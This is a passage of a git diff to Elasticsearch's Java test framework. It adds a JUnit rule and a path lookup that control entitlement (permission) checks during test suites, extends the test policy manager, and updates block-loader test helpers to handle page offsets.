+ String classPathProperty = System.getProperty("java.class.path"); + + Set classPathEntries; + if (classPathProperty == null) { + classPathEntries = Set.of(); + } else { + classPathEntries = Arrays.stream(classPathProperty.split(separator)).map(PathUtils::get).collect(toCollection(TreeSet::new)); + } FilesEntitlementsValidation.validate(pluginPolicies, pathLookup); + String testOnlyPathString = System.getenv("es.entitlement.testOnlyPath"); + Set testOnlyClassPath; + if (testOnlyPathString == null) { + testOnlyClassPath = Set.of(); + } else { + testOnlyClassPath = Arrays.stream(testOnlyPathString.split(separator)) + .map(PathUtils::get) + .map(Path::toUri) + .collect(toCollection(TreeSet::new)); + } + return new TestPolicyManager( HardcodedEntitlements.serverPolicy(null, null), HardcodedEntitlements.agentEntitlements(), pluginPolicies, scopeResolver, - Map.of(), - pathLookup + pathLookup, + classPathEntries, + testOnlyClassPath ); } - private record TestPluginData(String pluginName, boolean isModular, boolean isExternalPlugin) {} - private static Map parsePluginsPolicies(List pluginsData) { Map policies = new HashMap<>(); for (var pluginData : pluginsData) { @@ -137,4 +173,6 @@ private static InputStream getStream(URL resource) throws IOException { return resource.openStream(); } + private record TestPluginData(String pluginName, boolean isModular, boolean isExternalPlugin) {} + } diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementsRule.java b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementsRule.java new file mode 100644 index 0000000000000..1c057de296e9b --- /dev/null +++ b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementsRule.java @@ -0,0 +1,193 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */
+
+package org.elasticsearch.entitlement.bootstrap;
+
+import org.apache.lucene.tests.mockfile.FilterPath;
+import org.elasticsearch.common.Strings;
+import org.elasticsearch.common.settings.Settings;
+import org.elasticsearch.core.SuppressForbidden;
+import org.elasticsearch.entitlement.runtime.policy.PathLookup;
+import org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir;
+import org.elasticsearch.entitlement.runtime.policy.TestPolicyManager;
+import org.elasticsearch.logging.LogManager;
+import org.elasticsearch.logging.Logger;
+import org.elasticsearch.test.ESTestCase;
+import org.junit.rules.TestRule;
+import org.junit.runner.Description;
+import org.junit.runners.model.Statement;
+
+import java.io.Closeable;
+import java.nio.file.Path;
+import java.nio.file.Paths;
+import java.util.List;
+import java.util.concurrent.atomic.AtomicBoolean;
+import java.util.function.Consumer;
+
+import static org.elasticsearch.env.Environment.PATH_DATA_SETTING;
+import static org.elasticsearch.env.Environment.PATH_HOME_SETTING;
+import static org.elasticsearch.env.Environment.PATH_REPO_SETTING;
+import static org.elasticsearch.env.Environment.PATH_SHARED_DATA_SETTING;
+
+public class TestEntitlementsRule implements TestRule {
+    private static final Logger logger = LogManager.getLogger(TestEntitlementsRule.class);
+
+    private static final AtomicBoolean active = new AtomicBoolean(false);
+    private final TestPolicyManager policyManager;
+    private final TestPathLookup pathLookup;
+
+    public TestEntitlementsRule() {
+        policyManager = TestEntitlementBootstrap.testPolicyManager();
+        pathLookup = TestEntitlementBootstrap.testPathLookup();
+        assert (policyManager == null) == (pathLookup == null);
+    }
+
+    @Override
+    public Statement apply(Statement base, Description description) {
+        assert description.isSuite() : "must be used as ClassRule";
+
+        // class / suite level
+        boolean withoutEntitlements = description.getAnnotation(ESTestCase.WithoutEntitlements.class) != null;
+        boolean withEntitlementsOnTestCode = description.getAnnotation(ESTestCase.WithEntitlementsOnTestCode.class) != null;
+        var entitledPackages = description.getAnnotation(ESTestCase.EntitledTestPackages.class);
+
+        if (policyManager != null) {
+            return new Statement() {
+                @Override
+                public void evaluate() throws Throwable {
+                    if (active.compareAndSet(false, true)) {
+                        try {
+                            pathLookup.reset();
+                            policyManager.setActive(false == withoutEntitlements);
+                            policyManager.setTriviallyAllowingTestCode(false == withEntitlementsOnTestCode);
+                            if (entitledPackages != null) {
+                                assert entitledPackages.value().length > 0 : "No test packages specified in @EntitledTestPackages";
+                                policyManager.setEntitledTestPackages(entitledPackages.value());
+                            } else {
+                                policyManager.setEntitledTestPackages();
+                            }
+                            policyManager.clearModuleEntitlementsCache();
+                            // evaluate the suite
+                            base.evaluate();
+                        } finally {
+                            pathLookup.reset();
+                            policyManager.resetAfterTest();
+                            active.set(false);
+                        }
+                    } else {
+                        throw new AssertionError("TestPolicyManager doesn't support test isolation, test suites cannot be run in parallel");
+                    }
+                }
+            };
+        } else if (withEntitlementsOnTestCode) {
+            throw new AssertionError(
+                "Cannot use @WithEntitlementsOnTestCode on tests that are not configured to use entitlements for testing"
+            );
+        } else {
+            return base;
+        }
+    }
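+    // Illustrative sketch (hypothetical suite, names invented): apply() above reads this
+    // annotation and deactivates the policy manager for the whole suite:
+    //
+    //     @ESTestCase.WithoutEntitlements
+    //     public class MyLegacyTests extends ESTestCase {
+    //         public void testSomething() { /* runs without entitlement checks */ }
+    //     }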
+    /**
+     * Temporarily adds node-path-based entitlements, derived from a node's {@code settings} and {@code configPath},
+     * until the returned handle is closed.
+     * @see PathLookup
+     */
+    public Closeable addEntitledNodePaths(Settings settings, Path configPath) {
+        if (policyManager == null) {
+            return () -> {}; // noop if not running with entitlements
+        }
+
+        var unwrappedConfigPath = configPath;
+        while (unwrappedConfigPath instanceof FilterPath fPath) {
+            unwrappedConfigPath = fPath.getDelegate();
+        }
+        EntitledNodePaths entitledNodePaths = new EntitledNodePaths(settings, unwrappedConfigPath, this::removeEntitledNodePaths);
+        addEntitledNodePaths(entitledNodePaths);
+        return entitledNodePaths;
+    }
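+    // Illustrative sketch (hypothetical caller; nodeSettings/configPath are invented names):
+    // the grant is scoped to a node's lifetime via the returned handle:
+    //
+    //     Closeable grant = TEST_ENTITLEMENTS.addEntitledNodePaths(nodeSettings, configPath);
+    //     try {
+    //         // the node may now access its config, data, shared data and repo dirs
+    //     } finally {
+    //         grant.close(); // see EntitledNodePaths.close() below; revocation is currently deferred
+    //     }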
+ // onClose.accept(this); + } + + @Override + public String toString() { + return Strings.format( + "EntitledNodePaths[configDir=%s, dataDirs=%s, sharedDataDir=%s, repoDirs=%s]", + configDir(), + dataDirs(), + sharedDataDir(), + repoDirs() + ); + } + } + + private void addEntitledNodePaths(EntitledNodePaths entitledNodePaths) { + logger.debug("Adding {}", entitledNodePaths); + pathLookup.add(BaseDir.CONFIG, entitledNodePaths.configDir()); + pathLookup.add(BaseDir.DATA, entitledNodePaths.dataDirs()); + pathLookup.add(BaseDir.SHARED_DATA, entitledNodePaths.sharedDataDir()); + pathLookup.add(BaseDir.SHARED_REPO, entitledNodePaths.repoDirs()); + policyManager.clearModuleEntitlementsCache(); + } + + private void removeEntitledNodePaths(EntitledNodePaths entitledNodePaths) { + logger.debug("Removing {}", entitledNodePaths); + pathLookup.remove(BaseDir.CONFIG, entitledNodePaths.configDir()); + pathLookup.remove(BaseDir.DATA, entitledNodePaths.dataDirs()); + pathLookup.remove(BaseDir.SHARED_DATA, entitledNodePaths.sharedDataDir()); + pathLookup.remove(BaseDir.SHARED_REPO, entitledNodePaths.repoDirs()); + policyManager.clearModuleEntitlementsCache(); + } +} diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestPathLookup.java b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestPathLookup.java new file mode 100644 index 0000000000000..1e491dec1d710 --- /dev/null +++ b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestPathLookup.java @@ -0,0 +1,88 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestPathLookup.java b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestPathLookup.java
new file mode 100644
index 0000000000000..1e491dec1d710
--- /dev/null
+++ b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestPathLookup.java
@@ -0,0 +1,88 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the "Elastic License
+ * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
+ * Public License v 1"; you may not use this file except in compliance with, at
+ * your election, the "Elastic License 2.0", the "GNU Affero General Public
+ * License v3.0 only", or the "Server Side Public License, v 1".
+ */
+
+package org.elasticsearch.entitlement.bootstrap;
+
+import org.apache.lucene.tests.mockfile.FilterFileSystem;
+import org.elasticsearch.entitlement.runtime.policy.PathLookup;
+
+import java.nio.file.Path;
+import java.util.ArrayList;
+import java.util.Collection;
+import java.util.Collections;
+import java.util.List;
+import java.util.Map;
+import java.util.concurrent.ConcurrentHashMap;
+import java.util.function.BiConsumer;
+import java.util.function.BiFunction;
+import java.util.stream.Stream;
+
+import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.TEMP;
+
+class TestPathLookup implements PathLookup {
+    private final Map<BaseDir, Collection<Path>> baseDirPaths;
+
+    TestPathLookup(Path tempDir) {
+        baseDirPaths = new ConcurrentHashMap<>();
+        baseDirPaths.put(TEMP, List.of(tempDir));
+    }
+
+    @Override
+    public Path pidFile() {
+        return null;
+    }
+
+    @Override
+    public Stream<Path> getBaseDirPaths(BaseDir baseDir) {
+        return baseDirPaths.getOrDefault(baseDir, List.of()).stream();
+    }
+
+    @Override
+    public Stream<Path> resolveSettingPaths(BaseDir baseDir, String settingName) {
+        return Stream.empty();
+    }
+
+    @Override
+    public boolean isPathOnDefaultFilesystem(Path path) {
+        var fileSystem = path.getFileSystem();
+        if (fileSystem.getClass() != DEFAULT_FILESYSTEM_CLASS) {
+            while (fileSystem instanceof FilterFileSystem ffs) {
+                fileSystem = ffs.getDelegate();
+            }
+        }
+        return fileSystem.getClass() == DEFAULT_FILESYSTEM_CLASS;
+    }
+
+    void reset() {
+        baseDirPaths.keySet().retainAll(List.of(TEMP));
+    }
+
+    void add(BaseDir baseDir, Path... paths) {
+        baseDirPaths.compute(baseDir, baseDirModifier(Collection::add, paths));
+    }
+
+    void remove(BaseDir baseDir, Path... paths) {
+        baseDirPaths.compute(baseDir, baseDirModifier(Collection::remove, paths));
+    }
+
+    // This must allow for duplicate paths between nodes; the config dir, for instance, is shared across all nodes.
+    private static BiFunction<BaseDir, Collection<Path>, Collection<Path>> baseDirModifier(
+        BiConsumer<Collection<Path>, Path> operation,
+        Path... updates
+    ) {
+        // always return a new unmodifiable copy
+        return (BaseDir baseDir, Collection<Path> paths) -> {
+            paths = paths == null ? new ArrayList<>() : new ArrayList<>(paths);
+            for (Path update : updates) {
+                operation.accept(paths, update);
+            }
+            return Collections.unmodifiableCollection(paths);
+        };
+    }
+}
diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManager.java b/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManager.java
index 2acb31182c1f8..f7397c8f898ed 100644
--- a/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManager.java
+++ b/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManager.java
@@ -9,31 +9,90 @@
 package org.elasticsearch.entitlement.runtime.policy;
 
+import org.elasticsearch.common.util.ArrayUtils;
 import org.elasticsearch.entitlement.runtime.policy.entitlements.Entitlement;
+import org.elasticsearch.test.ESTestCase;
 
+import java.net.URI;
+import java.net.URISyntaxException;
 import java.nio.file.Path;
+import java.security.CodeSource;
+import java.security.ProtectionDomain;
+import java.util.Arrays;
 import java.util.Collection;
 import java.util.List;
 import java.util.Map;
+import java.util.concurrent.ConcurrentHashMap;
 import java.util.function.Function;
 
+import static java.util.Objects.requireNonNull;
+
 public class TestPolicyManager extends PolicyManager {
+
+    boolean isActive;
+    boolean isTriviallyAllowingTestCode;
+    String[] entitledTestPackages;
+
+    /**
+     * We don't have modules in tests, so we can't use the inherited map of entitlements per module.
+     * We need this larger map per class instead.
+     */
+    final Map<Class<?>, ModuleEntitlements> classEntitlementsMap = new ConcurrentHashMap<>();
+    final Collection<Path> classpath;
+    final Collection<URI> testOnlyClasspath;
+
     public TestPolicyManager(
         Policy serverPolicy,
         List<Entitlement> apmAgentEntitlements,
         Map<String, Policy> pluginPolicies,
         Function<Class<?>, PolicyScope> scopeResolver,
-        Map<String, Collection<Path>> pluginSourcePaths,
-        PathLookup pathLookup
+        PathLookup pathLookup,
+        Collection<Path> classpath,
+        Collection<URI> testOnlyClasspath
    ) {
-        super(serverPolicy, apmAgentEntitlements, pluginPolicies, scopeResolver, pluginSourcePaths, pathLookup);
+        super(serverPolicy, apmAgentEntitlements, pluginPolicies, scopeResolver, name -> classpath, pathLookup);
+        this.classpath = classpath;
+        this.testOnlyClasspath = testOnlyClasspath;
+        resetAfterTest();
+    }
+
+    public void setActive(boolean newValue) {
+        this.isActive = newValue;
+    }
+
+    public void setTriviallyAllowingTestCode(boolean newValue) {
+        this.isTriviallyAllowingTestCode = newValue;
+    }
+
+    public void setEntitledTestPackages(String... entitledTestPackages) {
+        if (entitledTestPackages == null || entitledTestPackages.length == 0) {
+            this.entitledTestPackages = TEST_FRAMEWORK_PACKAGE_PREFIXES; // already validated and sorted
+            return;
+        }
+
+        assertNoRedundantPrefixes(TEST_FRAMEWORK_PACKAGE_PREFIXES, entitledTestPackages, false);
+        if (entitledTestPackages.length > 1) {
+            assertNoRedundantPrefixes(entitledTestPackages, entitledTestPackages, true);
+        }
+        String[] packages = ArrayUtils.concat(TEST_FRAMEWORK_PACKAGE_PREFIXES, entitledTestPackages);
+        Arrays.sort(packages);
+        this.entitledTestPackages = packages;
+    }
+
+    public final void resetAfterTest() {
+        isActive = false;
+        isTriviallyAllowingTestCode = true;
+        entitledTestPackages = TEST_FRAMEWORK_PACKAGE_PREFIXES;
+        clearModuleEntitlementsCache();
+    }
 
     /**
-     * Called between tests so each test is not affected by prior tests
+     * Clear cached module entitlements.
+     * This is required after updating path entries.
      */
-    public void reset() {
-        super.moduleEntitlementsMap.clear();
+    public final void clearModuleEntitlementsCache() {
+        assert moduleEntitlementsMap.isEmpty() : "We're not supposed to be using moduleEntitlementsMap in tests";
+        classEntitlementsMap.clear();
     }
 
     @Override
@@ -44,7 +103,36 @@ protected boolean isTrustedSystemClass(Class<?> requestingClass) {
 
     @Override
     boolean isTriviallyAllowed(Class<?> requestingClass) {
-        return isTestFrameworkClass(requestingClass) || isEntitlementClass(requestingClass) || super.isTriviallyAllowed(requestingClass);
+        if (isActive == false) {
+            return true;
+        }
+        if (isEntitlementClass(requestingClass)) {
+            return true;
+        }
+        if (isTestFrameworkClass(requestingClass)) {
+            return true;
+        }
+        if ("org.elasticsearch.jdk".equals(requestingClass.getPackageName())) {
+            // PluginsLoaderTests, PluginsServiceTests, PluginsUtilsTests
+            return true;
+        }
+        if ("org.elasticsearch.nativeaccess".equals(requestingClass.getPackageName())) {
+            // UberModuleClassLoaderTests
+            return true;
+        }
+        if (requestingClass.getPackageName().startsWith("org.elasticsearch.plugins")) {
+            // PluginsServiceTests, NamedComponentReaderTests
+            return true;
+        }
+        if (isTriviallyAllowingTestCode && isTestCode(requestingClass)) {
+            return true;
+        }
+        return super.isTriviallyAllowed(requestingClass);
+    }
+
+    @Override
+    protected Collection<Path> getComponentPathsFromClass(Class<?> requestingClass) {
+        return classpath; // required to grant read access to the production source and test resources
     }
 
     private boolean isEntitlementClass(Class<?> requestingClass) {
@@ -53,7 +141,95 @@ private boolean isEntitlementClass(Class<?> requestingClass) {
     }
 
     private boolean isTestFrameworkClass(Class<?> requestingClass) {
-        String packageName = requestingClass.getPackageName();
-        return packageName.startsWith("org.junit") || packageName.startsWith("org.gradle");
+        return isTestFrameworkClass(entitledTestPackages, requestingClass.getPackageName());
+    }
+
+    // no redundant entries allowed, see assertNoRedundantPrefixes
+    static boolean isTestFrameworkClass(String[] sortedPrefixes, String packageName) {
+        int idx = Arrays.binarySearch(sortedPrefixes, packageName);
+        if (idx >= 0) {
+            return true;
+        }
+        idx = -idx - 2; // candidate package index (insertion point - 1)
+        if (idx >= 0 && idx < sortedPrefixes.length) {
+            String candidate = sortedPrefixes[idx];
+            if (packageName.startsWith(candidate)
+                && (packageName.length() == candidate.length() || packageName.charAt(candidate.length()) == '.')) {
+                return true;
+            }
+        }
+        return false;
+    }
+
+    private static boolean isNotPrefixMatch(String name, String prefix, boolean discardExactMatch) {
+        assert prefix.endsWith(".") == false : "Invalid package prefix ending with '.' [" + prefix + "]";
+        if (name == prefix || name.startsWith(prefix)) {
+            if (name.length() == prefix.length()) {
+                return discardExactMatch;
+            }
+            return false == (name.length() > prefix.length() && name.charAt(prefix.length()) == '.');
+        }
+        return true;
+    }
+
+    static void assertNoRedundantPrefixes(String[] setA, String[] setB, boolean discardExactMatch) {
+        for (String a : setA) {
+            for (String b : setB) {
+                assert isNotPrefixMatch(a, b, discardExactMatch) && isNotPrefixMatch(b, a, discardExactMatch)
+                    : "Redundant prefix entries: [" + a + ", " + b + "]";
+            }
+        }
+    }
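+    // Illustrative trace of the sorted-prefix lookup above (hypothetical inputs):
+    //
+    //     String[] prefixes = { "org.gradle", "org.junit" }; // sorted, no redundant entries
+    //     isTestFrameworkClass(prefixes, "org.junit.runners");
+    //     // binarySearch misses (insertion point 2), so idx = -(-3) - 2 = 1 selects "org.junit";
+    //     // the char after the prefix is '.', a package boundary, so the result is true
+    //     isTestFrameworkClass(prefixes, "org.junitx");
+    //     // same candidate, but the next char is 'x', not a package boundary, so the result is false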
+    private boolean isTestCode(Class<?> requestingClass) {
+        // TODO: Cache this? It's expensive
+        for (Class<?> candidate = requireNonNull(requestingClass); candidate != null; candidate = candidate.getDeclaringClass()) {
+            if (ESTestCase.class.isAssignableFrom(candidate)) {
+                return true;
+            }
+        }
+        ProtectionDomain protectionDomain = requestingClass.getProtectionDomain();
+        CodeSource codeSource = protectionDomain.getCodeSource();
+        if (codeSource == null) {
+            // This can happen for JDK classes
+            return false;
+        }
+        URI needle;
+        try {
+            needle = codeSource.getLocation().toURI();
+            if (needle.getScheme().equals("jrt")) {
+                return false; // won't be on testOnlyClasspath
+            }
+        } catch (URISyntaxException e) {
+            throw new IllegalStateException(e);
+        }
+        boolean result = testOnlyClasspath.contains(needle);
+        return result;
+    }
+
+    private static final String[] TEST_FRAMEWORK_PACKAGE_PREFIXES = {
+        "org.gradle",
+
+        "org.jcodings", // A library loaded with SPI that tries to create a CharsetProvider
+        "com.google.common.jimfs", // Used on Windows
+
+        // We shouldn't really need the rest of these. They should be discovered on the testOnlyClasspath.
+        "com.carrotsearch.randomizedtesting",
+        "com.sun.tools.javac",
+        "org.apache.lucene.tests", // Interferes with SSLErrorMessageFileTests.testMessageForPemCertificateOutsideConfigDir
+        "org.junit",
+        "org.mockito",
+        "net.bytebuddy", // Mockito uses this
+
+        "org.bouncycastle.jsse.provider" // Used in test code if FIPS is enabled, support more fine-grained config in ES-12128
+    };
+
+    static {
+        Arrays.sort(TEST_FRAMEWORK_PACKAGE_PREFIXES);
+    }
+
+    @Override
+    protected ModuleEntitlements getEntitlements(Class<?> requestingClass) {
+        return classEntitlementsMap.computeIfAbsent(requestingClass, this::computeEntitlements);
+    }
 }
diff --git a/test/framework/src/main/java/org/elasticsearch/index/mapper/AbstractScriptFieldTypeTestCase.java b/test/framework/src/main/java/org/elasticsearch/index/mapper/AbstractScriptFieldTypeTestCase.java
index 1c785d58f9804..f099aaac463db 100644
--- a/test/framework/src/main/java/org/elasticsearch/index/mapper/AbstractScriptFieldTypeTestCase.java
+++ b/test/framework/src/main/java/org/elasticsearch/index/mapper/AbstractScriptFieldTypeTestCase.java
@@ -420,13 +420,12 @@ public final void testCacheable() throws IOException {
         }
     }
 
-    protected final List<Object> blockLoaderReadValuesFromColumnAtATimeReader(DirectoryReader reader, MappedFieldType fieldType)
+    protected final List<Object> blockLoaderReadValuesFromColumnAtATimeReader(DirectoryReader reader, MappedFieldType fieldType, int offset)
         throws IOException {
         BlockLoader loader = fieldType.blockLoader(blContext());
         List<Object> all = new ArrayList<>();
         for (LeafReaderContext ctx : reader.leaves()) {
-            TestBlock block = (TestBlock) loader.columnAtATimeReader(ctx)
-                .read(TestBlock.factory(ctx.reader().numDocs()), TestBlock.docs(ctx));
+            TestBlock block = (TestBlock) loader.columnAtATimeReader(ctx).read(TestBlock.factory(), TestBlock.docs(ctx), offset);
             for (int i = 0; i < block.size(); i++) {
                 all.add(block.get(i));
             }
@@ -440,7 +439,7 @@ protected final List<Object> blockLoaderReadValuesFromRowStrideReader(DirectoryR
         List<Object> all = new ArrayList<>();
         for (LeafReaderContext ctx : reader.leaves()) {
             BlockLoader.RowStrideReader blockReader = loader.rowStrideReader(ctx);
-            BlockLoader.Builder builder = loader.builder(TestBlock.factory(ctx.reader().numDocs()), ctx.reader().numDocs());
+            BlockLoader.Builder builder = loader.builder(TestBlock.factory(), ctx.reader().numDocs());
             for (int i = 0; i < ctx.reader().numDocs(); i++) {
                 blockReader.read(i, null, builder);
             }
diff --git
a/test/framework/src/main/java/org/elasticsearch/index/mapper/BlockLoaderTestRunner.java b/test/framework/src/main/java/org/elasticsearch/index/mapper/BlockLoaderTestRunner.java index eb5bbea9e6bba..eeb1a349d8bbc 100644 --- a/test/framework/src/main/java/org/elasticsearch/index/mapper/BlockLoaderTestRunner.java +++ b/test/framework/src/main/java/org/elasticsearch/index/mapper/BlockLoaderTestRunner.java @@ -13,6 +13,7 @@ import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.store.Directory; import org.apache.lucene.tests.index.RandomIndexWriter; +import org.apache.lucene.util.BytesRef; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.index.IndexSettings; import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; @@ -21,14 +22,22 @@ import org.elasticsearch.search.lookup.SearchLookup; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.XContentType; -import org.junit.Assert; +import org.hamcrest.BaseMatcher; +import org.hamcrest.Description; +import org.hamcrest.Matcher; import java.io.IOException; +import java.lang.reflect.Array; +import java.util.ArrayList; +import java.util.List; import java.util.Map; import java.util.Set; import static org.apache.lucene.tests.util.LuceneTestCase.newDirectory; import static org.apache.lucene.tests.util.LuceneTestCase.random; +import static org.elasticsearch.index.mapper.BlockLoaderTestRunner.PrettyEqual.prettyEqualTo; +import static org.elasticsearch.test.ESTestCase.between; +import static org.elasticsearch.test.ESTestCase.randomBoolean; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.equalTo; @@ -44,7 +53,7 @@ public void runTest(MapperService mapperService, Map document, O var documentXContent = XContentBuilder.builder(XContentType.JSON.xContent()).map(document); Object blockLoaderResult = setupAndInvokeBlockLoader(mapperService, documentXContent, blockLoaderFieldName); - Assert.assertEquals(expected, blockLoaderResult); + assertThat(blockLoaderResult, prettyEqualTo(expected)); } private Object setupAndInvokeBlockLoader(MapperService mapperService, XContentBuilder document, String fieldName) throws IOException { @@ -62,7 +71,11 @@ private Object setupAndInvokeBlockLoader(MapperService mapperService, XContentBu ); LuceneDocument doc = mapperService.documentMapper().parse(source).rootDoc(); - iw.addDocument(doc); + /* + * Add three documents with doc id 0, 1, 2. The real document is 1. + * The other two are empty documents. + */ + iw.addDocuments(List.of(List.of(), doc, List.of())); iw.close(); try (DirectoryReader reader = DirectoryReader.open(directory)) { @@ -76,9 +89,32 @@ private Object load(BlockLoader blockLoader, LeafReaderContext context, MapperSe // `columnAtATimeReader` is tried first, we mimic `ValuesSourceReaderOperator` var columnAtATimeReader = blockLoader.columnAtATimeReader(context); if (columnAtATimeReader != null) { - BlockLoader.Docs docs = TestBlock.docs(0); - var block = (TestBlock) columnAtATimeReader.read(TestBlock.factory(context.reader().numDocs()), docs); - assertThat(block.size(), equalTo(1)); + int[] docArray; + int offset; + if (randomBoolean()) { + // Half the time we load a single document. Nice and simple. + docArray = new int[] { 1 }; + offset = 0; + } else { + /* + * The other half the time we emulate loading a larger page, + * starting part way through the page. 
+ */ + docArray = new int[between(2, 10)]; + offset = between(0, docArray.length - 1); + for (int i = 0; i < docArray.length; i++) { + if (i < offset) { + docArray[i] = 0; + } else if (i == offset) { + docArray[i] = 1; + } else { + docArray[i] = 2; + } + } + } + BlockLoader.Docs docs = TestBlock.docs(docArray); + var block = (TestBlock) columnAtATimeReader.read(TestBlock.factory(), docs, offset); + assertThat(block.size(), equalTo(docArray.length - offset)); return block.get(0); } @@ -95,10 +131,10 @@ private Object load(BlockLoader blockLoader, LeafReaderContext context, MapperSe StoredFieldLoader.fromSpec(storedFieldsSpec).getLoader(context, null), leafSourceLoader ); - storedFieldsLoader.advanceTo(0); + storedFieldsLoader.advanceTo(1); - BlockLoader.Builder builder = blockLoader.builder(TestBlock.factory(context.reader().numDocs()), 1); - blockLoader.rowStrideReader(context).read(0, storedFieldsLoader, builder); + BlockLoader.Builder builder = blockLoader.builder(TestBlock.factory(), 1); + blockLoader.rowStrideReader(context).read(1, storedFieldsLoader, builder); var block = (TestBlock) builder.build(); assertThat(block.size(), equalTo(1)); @@ -145,4 +181,86 @@ public FieldNamesFieldMapper.FieldNamesFieldType fieldNames() { } }); } + + // Copied from org.hamcrest.core.IsEqual and modified to pretty print failure when bytesref + static class PrettyEqual extends BaseMatcher { + + private final Object expectedValue; + + PrettyEqual(T equalArg) { + expectedValue = equalArg; + } + + @Override + public boolean matches(Object actualValue) { + return areEqual(actualValue, expectedValue); + } + + @Override + public void describeTo(Description description) { + description.appendValue(attemptMakeReadable(expectedValue)); + } + + @Override + public void describeMismatch(Object item, Description description) { + super.describeMismatch(attemptMakeReadable(item), description); + } + + private static boolean areEqual(Object actual, Object expected) { + if (actual == null) { + return expected == null; + } + + if (expected != null && isArray(actual)) { + return isArray(expected) && areArraysEqual(actual, expected); + } + + return actual.equals(expected); + } + + private static boolean areArraysEqual(Object actualArray, Object expectedArray) { + return areArrayLengthsEqual(actualArray, expectedArray) && areArrayElementsEqual(actualArray, expectedArray); + } + + private static boolean areArrayLengthsEqual(Object actualArray, Object expectedArray) { + return Array.getLength(actualArray) == Array.getLength(expectedArray); + } + + private static boolean areArrayElementsEqual(Object actualArray, Object expectedArray) { + for (int i = 0; i < Array.getLength(actualArray); i++) { + if (areEqual(Array.get(actualArray, i), Array.get(expectedArray, i)) == false) { + return false; + } + } + return true; + } + + private static boolean isArray(Object o) { + return o.getClass().isArray(); + } + + // Attempt to make assertions readable: + static Object attemptMakeReadable(Object expected) { + try { + if (expected instanceof BytesRef bytesRef) { + expected = bytesRef.utf8ToString(); + } else if (expected instanceof List list && list.getFirst() instanceof BytesRef) { + List expectedList = new ArrayList<>(list.size()); + for (Object e : list) { + expectedList.add(((BytesRef) e).utf8ToString()); + } + expected = expectedList; + } + return expected; + } catch (Exception | AssertionError e) { + // ip/geo fields can't be converted to strings: + return expected; + } + } + + public static Matcher prettyEqualTo(T operand) { + 
return new PrettyEqual<>(operand); + } + + } } diff --git a/test/framework/src/main/java/org/elasticsearch/index/mapper/TestBlock.java b/test/framework/src/main/java/org/elasticsearch/index/mapper/TestBlock.java index 779d7a2a976d9..b746609f8d659 100644 --- a/test/framework/src/main/java/org/elasticsearch/index/mapper/TestBlock.java +++ b/test/framework/src/main/java/org/elasticsearch/index/mapper/TestBlock.java @@ -12,6 +12,7 @@ import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.index.SortedDocValues; import org.apache.lucene.util.BytesRef; +import org.hamcrest.Matcher; import java.io.IOException; import java.io.UncheckedIOException; @@ -19,11 +20,14 @@ import java.util.HashMap; import java.util.List; +import static org.elasticsearch.test.ESTestCase.assertThat; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.hasSize; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertNull; public class TestBlock implements BlockLoader.Block { - public static BlockLoader.BlockFactory factory(int pageSize) { + public static BlockLoader.BlockFactory factory() { return new BlockLoader.BlockFactory() { @Override public BlockLoader.BooleanBuilder booleansFromDocValues(int expectedCount) { @@ -33,6 +37,10 @@ public BlockLoader.BooleanBuilder booleansFromDocValues(int expectedCount) { @Override public BlockLoader.BooleanBuilder booleans(int expectedCount) { class BooleansBuilder extends TestBlock.Builder implements BlockLoader.BooleanBuilder { + private BooleansBuilder() { + super(expectedCount); + } + @Override public BooleansBuilder appendBoolean(boolean value) { add(value); @@ -44,12 +52,27 @@ public BooleansBuilder appendBoolean(boolean value) { @Override public BlockLoader.BytesRefBuilder bytesRefsFromDocValues(int expectedCount) { - return bytesRefs(expectedCount); + class BytesRefsFromDocValuesBuilder extends TestBlock.Builder implements BlockLoader.BytesRefBuilder { + private BytesRefsFromDocValuesBuilder() { + super(expectedCount); + } + + @Override + public BytesRefsFromDocValuesBuilder appendBytesRef(BytesRef value) { + add(BytesRef.deepCopyOf(value)); + return this; + } + } + return new BytesRefsFromDocValuesBuilder(); } @Override public BlockLoader.BytesRefBuilder bytesRefs(int expectedCount) { class BytesRefsBuilder extends TestBlock.Builder implements BlockLoader.BytesRefBuilder { + private BytesRefsBuilder() { + super(expectedCount); + } + @Override public BytesRefsBuilder appendBytesRef(BytesRef value) { add(BytesRef.deepCopyOf(value)); @@ -67,6 +90,10 @@ public BlockLoader.DoubleBuilder 